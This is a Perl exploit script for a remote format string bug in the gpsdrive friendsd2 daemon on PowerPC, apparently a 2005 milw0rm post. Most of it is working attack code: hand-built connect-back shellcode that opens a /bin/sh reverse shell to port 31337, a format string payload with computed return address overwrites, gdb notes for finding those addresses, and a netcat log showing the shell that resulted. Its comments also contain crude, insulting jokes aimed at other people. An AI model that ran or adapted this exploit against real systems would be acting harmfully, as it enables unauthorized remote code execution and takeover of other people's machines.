gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc)

                                                #!/usr/bin/perl -w
# 
# Heh - Code by KF (kf_lists[at]digital_munition[dot]com)
#     - Shellcode by Charles Stevenson
# http://www.digitalmunition.com
#
# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. 
# Free 14 day Testicle licking trial available! 
#
#                           IIIIIIIIII
#                           I::::::::I
#                           I::::::::I
#                           II::::::II
#                             I::::I
#                             I::::I ##     ##  #######  ########  ##    ##
#                             I::::I ##     ## ##     ## ##     ##   ####
# EEEEEEEEEEEEEEEEEEEEEE      I::::I ##     ## ##     ## ########     ##
# E::::::::::::::::::::E      I::::I  ##   ##  ##     ## ##   ##      ##
# E::::::::::::::::::::E      I::::I   ## ##   ##     ## ##    ##     ##
# EE::::::EEEEEEEEE::::E      I::::I    ###     #######  ##     ##    ##
#   E:::::E       EEEEEE      I::::I
#   E:::::E                 II::::::II
#   E::::::EEEEEEEEEE       I::::::::I
#   E:::::::::::::::E  and  I::::::::I
#   E:::::::::::::::E       IIIIIIIIII
#   E::::::EEEEEEEEEE    ########   #######  ##    ## ##    ##
#   E:::::E              ##     ## ##     ## ###   ##  ##  ##
#   E:::::E       EEEEEE ##     ## ##     ## ####  ##   ####
# EE::::::EEEEEEEE:::::E ########  ##     ## ## ## ##    ##
# E::::::::::::::::::::E ##     ## ##     ## ##  ####    ##
# E::::::::::::::::::::E ##     ## ##     ## ##   ###    ##
# EEEEEEEEEEEEEEEEEEEEEE ########   #######  ##    ##    ##
# (Kickin you all up in your grill piece since the early 90's)
#                                                      
# friendsd.c:367:   fprintf (stderr, txt);
#
# Tested against: gpsdrive_2.09-2_powerpc.deb
#
# Crash the program and go to frame 2
# 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
# (gdb) bt
# #0  0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
# #1  0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6
# #2  0x0f6825d0 in fprintf () from /lib/tls/libc.so.6
# #3  0x100024b8 in dg_echo ()
# #4  0x10002f28 in main ()
#
# Grab the address of Arglist for frame 2 and overwrite that +4
# (gdb) i f
# Stack level 2, frame at 0x7fffad70:
# pc = 0xf6825d0 in fprintf; saved pc 0x100024b8
# called by frame at 0x7fffae00, caller of frame at 0x7fff8700
# Arglist at 0x7fffad70, args:
# Locals at 0x7fffad70, Previous frame's sp in r1
#
# (gdb) x/a 0x7fffad70+4
# 0x7fffad74:     0xf6825d0 <fprintf+112>  (overwrite this)
#
# animosity:/home/kfinisterre# nc -l -p 31337 -vvv
# listening on [any] 31337 ...
# 192.168.1.1: inverse host lookup failed: Unknown host
# connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349
# id;
# uid=1000(kfinisterre) gid=1000(kfinisterre) 
# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)
# uname -a;
# Linux animosity 2.6.11-powerpc #1 Fri May 13 15:47:19 CEST 2005 ppc GNU/Linux
#
# This is NOT reliable or robust... Find your own damn pointers to overwrite

use Net::Friends;
use Data::Dumper;

$shellcode  =
"\x69\x69\x69\x69"  .  
# /* connect-core5.c by Charles Stevenson <[email protected]> */
"\x7c\x3f\x0b\x78" . #/*mr    r31,r1*/
"\x3b\x40\x01\x0e" . #/*li    r26,270*/
"\x3b\x5a\xfe\xf4" . #/*addi  r26,r26,-268*/
"\x7f\x43\xd3\x78" . #/*mr    r3,r26*/
"\x3b\x60\x01\x0d" . #/*li    r27,269*/
"\x3b\x7b\xfe\xf4" . #/*addi  r27,r27,-268*/
"\x7f\x64\xdb\x78" . #/*mr    r4,r27*/
"\x7c\xa5\x2a\x78" . #/*xor   r5,r5,r5*/
"\x7c\x3c\x0b\x78" . #/*mr    r28,r1*/
"\x3b\x9c\x01\x0c" . #/*addi  r28,r28,268*/
"\x90\x7c\xff\x08" . #/*stw   r3,-248(r28)*/
"\x90\x9c\xff\x0c" . #/*stw   r4,-244(r28)*/
"\x90\xbc\xff\x10" . #/*stw   r5,-240(r28)*/
"\x7f\x63\xdb\x78" . #/*mr    r3,r27*/
"\x3b\xdf\x01\x0c" . #/*addi  r30,r31,268*/
"\x38\x9e\xff\x08" . #/*addi  r4,r30,-248*/
"\x3b\x20\x01\x98" . #/*li    r25,408*/
"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/
"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/
"\x7c\x78\x1b\x78" . #/*mr    r24,r3*/
"\xb3\x5e\xff\x16" . #/*sth   r26,-234(r30)*/
"\x7f\xbd\xea\x78" . #/*xor   r29,r29,r29*/
#// Craft your exploit to poke these value in. Right now it's set
#// for port 31337 and ip 192.168.1.1. Here's an example
#// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1
#// 0xc0a8
#// 0x0101
"\x63\xbd" .  # /* PORT # */ 
"\x7a\x69" .  #/*ori   r29,r29,31337*/
"\xb3\xbe\xff\x18" . #/*sth   r29,-232(r30)*/
"\x3f\xa0" . # /*IP(A.B) */ 
#"\x42\x07" . # wtf is this?
"\xc0\xa8" . # /*lis   r29,-16216*/
"\x63\xbd" . # /*IP(C.D) */ 
#"\xa1\x39" . #  wtf is this? 
"\x01\x01" . # /*ori   r29,r29,257*/
"\x93\xbe\xff\x1a" . #/*stw   r29,-230(r30)*/
"\x93\x1c\xff\x08" . #/*stw   r24,-248(r28)*/
"\x3a\xde\xff\x16" . #/*addi  r22,r30,-234*/
"\x92\xdc\xff\x0c" . #/*stw   r22,-244(r28)*/
"\x3b\xa0\x01\x1c" . #/*li    r29,284*/
"\x38\xbd\xfe\xf4" . #/*addi  r5,r29,-268*/
"\x90\xbc\xff\x10" . #/*stw   r5,-240(r28)*/
"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/
"\x7c\x7a\xda\x14" . #/*add   r3,r26,r27*/
"\x38\x9c\xff\x08" . #/*addi  r4,r28,-248*/
"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/
"\x7f\x03\xc3\x78" . #/*mr    r3,r24*/
"\x7c\x84\x22\x78" . #/*xor   r4,r4,r4*/
"\x3a\xe0\x01\xf8" . #/*li    r23,504*/
"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/
"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/
"\x7f\x03\xc3\x78" . #/*mr    r3,r24*/
"\x7f\x64\xdb\x78" . #/*mr    r4,r27*/
"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/
"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/
#// comment out the next 4 lines to save 16 bytes and lose stderr
#//"\x7f\x03\xc3\x78"    /*mr    r3,r24*/
#//"\x7f\x44\xd3\x78"    /*mr    r4,r26*/
#//"\x7e\xe0\x1e\x70"    /*srawi r0,r23,3*/
#//"\x44\xde\xad\xf2"    /*.long0x44deadf2*/
"\x7c\xa5\x2a\x79" . #/*xor.  r5,r5,r5*/
"\x42\x40\xff\x35" . #/*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" . #/*mflr  r24*/
"\x3b\x18\x01\x34" . #/*addi  r24,r24,308*/
"\x98\xb8\xfe\xfb" . #/*stb   r5,-261(r24)*/	/* KF / Core / Ghandi mojo */
"\x38\x78\xfe\xf4" . #/*addi  r3,r24,-268*/
"\x90\x61\xff\xf8" . #/*stw   r3,-8(r1)*/
"\x38\x81\xff\xf8" . #/*addi  r4,r1,-8*/
"\x90\xa1\xff\xfc" . #/*stw   r5,-4(r1)*/
"\x3b\xc0\x01\x60" . #/*li    r30,352*/
"\x7f\xc0\x2e\x70" . #/*srawi r0,r30,5*/
"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/
"/bin/shZ";     # /* Z will become NULL */

$name = 'aaaaaaaa-aaaa';  
 
$writeaddr = 0x7fffad74; # Saved ret in frame 2 Arglist+4 (inside gdb)
$writeaddr = 0x7fffad94; # (outside gdb) Pladow! Kickin fools all up in the grill piece. 

$addy  = pack('l', $writeaddr);
$addy2 = pack('l', $writeaddr+2);

#$instr = 0x7fffae84;  # Shellcode (inside gdb)
$instr = 0x7fffaea4;  # Shellcode (outside gdb)

$lo = ($instr >> 0) & 0xffff;
$hi = ($instr >> 16) & 0xffff;
		
$hi = $hi - 0x4e;
$lo = (0x10000 + $lo) - $hi - 0x50;		

#$hi = 1; $lo =1;

$dir = "$addy$addy2|%." . $hi . "d|%28\$hn|%." . $lo . "d|%29\$hn$shellcode";

$friends = Net::Friends->new(shift || 'localhost');
$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir);
print Dumper($friends->query);

# P.S. Fsck drow! And did I mention k-otick blows! Gimme some freedom fries you bastards! 

# milw0rm.com [2005-11-04]